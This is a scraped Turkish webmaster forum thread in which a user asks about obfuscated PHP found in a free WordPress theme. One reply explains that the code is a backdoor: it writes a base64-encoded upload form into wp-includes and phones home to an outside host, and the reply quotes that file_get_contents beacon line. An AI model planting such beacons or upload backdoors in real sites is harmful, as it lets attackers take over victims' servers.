lostyazilim
tr.link

bu php kodu nedir ne anlama geliyor

7 Mesajlar 2.292 Okunma
acebozum
tr.link

Colder Colder WM Aracı Kullanıcı
  • Üyelik 02.11.2013
  • Yaş/Cinsiyet 28 / E
  • Meslek Web Tasarımcı
  • Konum İstanbul Avrupa
  • Ad Soyad H** D**
  • Mesajlar 68
  • Beğeniler 1 / 8
  • Ticaret 0, (%0)
merhaba arkadaşlar ben kod yazıyordum dosyaların için bunu buldum ne anlama geliyor bu kod neyindir biri bana söylesin sanki şifreleme gibi bişey ama çözemedim




 

 

En yakın lastikçi Lastik Tamircisi https://724mobillastikci.com
wmaraci
reklam

alparslan alparslan Sms Onayı Gerekli Banlı Kullanıcı
  • Üyelik 10.10.2011
  • Yaş/Cinsiyet - / E
  • Meslek Öğrenci
  • Konum
  • Ad Soyad ** **
  • Mesajlar 308
  • Beğeniler 27 / 39
  • Ticaret 9, (%100)
Şifrelenmiş php kodu ama çözülebilir tabi QOOO0000 fonksiyonunu da bulup yazar mısınız?
 

 

  • Üyelik 05.12.2024
  • Yaş/Cinsiyet - /
  • Meslek
  • Konum
  • Ad Soyad ** **
  • Mesajlar
  • Beğeniler /
  • Ticaret , (%)
muhtemelen bi lisans mekanizması yada bi shell'dir.
 

 

ByLegenS ByLegenS Sms Onayı Gerekli Banlı Kullanıcı
  • Üyelik 24.04.2011
  • Yaş/Cinsiyet 35 / E
  • Meslek Web Developer
  • Konum İstanbul Avrupa
  • Ad Soyad Y** K**
  • Mesajlar 43
  • Beğeniler 44 / 17
  • Ticaret 0, (%0)
tahminimce telif satırı ile ilgili bir kod, bu kısım dosya karakter sayısı olabilir : $Illl=120015;
 

 

wmaraci
wmaraci

MehmetARIK MehmetARIK Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 26.01.2014
  • Yaş/Cinsiyet 41 / E
  • Meslek Öğretmen
  • Konum İstanbul Anadolu
  • Ad Soyad M** A**
  • Mesajlar 626
  • Beğeniler 13 / 260
  • Ticaret 2, (%100)
Global. Kodlar obfuscate edilmiş. Karıştırılmış.
Karışık kodları düzelttikten sonra, muhtemelen ard arda tekrar eden belirli karakterleri silince gerçek şifrelenmiş olay ortaya çıkar. İşte ondan sonra nasıl şifrelendiğini bulup çözersin.
 

 

Markafem Markafem www.turkfem.com Kullanıcı
  • Üyelik 10.05.2014
  • Yaş/Cinsiyet 36 / E
  • Meslek Yazılım
  • Konum Amasya
  • Ad Soyad Ö** K**
  • Mesajlar 44
  • Beğeniler 9 / 11
  • Ticaret 1, (%100)



Resimde kırmızı çerçeve içine aldığım kod ile uzaktaki bir txt dosyasının içindeki kodların sitenize uygulanması mümkün kılınmış. Şöyle ki bu linkteki adrese girdiğimiz zaman şöyle bir sonuç ile karşılaşıyoruz:



Php bilen arkadaşlar daha iyi bileceklerdir ki bu dosyanın içindeki kodlar ile "/wp-includes/SimplePie/" dizininin içine theme-options.php isimli bir dosya oluşturulmakta ve bu dosyanın içinide "val(base64_decode" şeklinde başlayan kodlar yerleştirilmektedir. Bu kodu decode edip incelediğimiz zaman bir tür upload formu ile karşılaşıyoruz, oda şu şekildedir:



Gördüğünüz upload formunu oluşturup bu form sayesinde sitenize istedikleri zararlı dosyayı yüklemeleri, sadece bu bahsi geçen siteden tema indirip onu aktif etmenize bakıyor. Bu kadar basite indirgenmiş bir sistem oluşturulmuş. Peki bunlar benim siteme onlardan indirdiğim temayı kurduğumu nasıl bielceklerde bana zarar verebilecekler diye düşünebilirsiniz. Oda şu şekilde mümkün kılınmış:

@file_get_contents("http://yakaladimsizi.com/panel/l.php?a=http://".$_SERVER['SERVER_NAME']);

Satırı sayesinde sitenizde oluşturulmuş olan formun linki bu insanların panelinde görünebiliyor, ve bugun kim temamızı indirip tuzağa düşmüş diye kontrol edebiliyorlar.

Geçmiş olsun, ücretsiz tema indirip kullanmayın ...
TetraYazilim

kişi bu mesajı beğendi.

Colder Colder WM Aracı Kullanıcı
  • Üyelik 02.11.2013
  • Yaş/Cinsiyet 28 / E
  • Meslek Web Tasarımcı
  • Konum İstanbul Avrupa
  • Ad Soyad H** D**
  • Mesajlar 68
  • Beğeniler 1 / 8
  • Ticaret 0, (%0)
valla doğru bir tema vardı deneyeyim dedim demekki ondan buşalmış sileyim hemen :(
 

 

En yakın lastikçi Lastik Tamircisi https://724mobillastikci.com
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al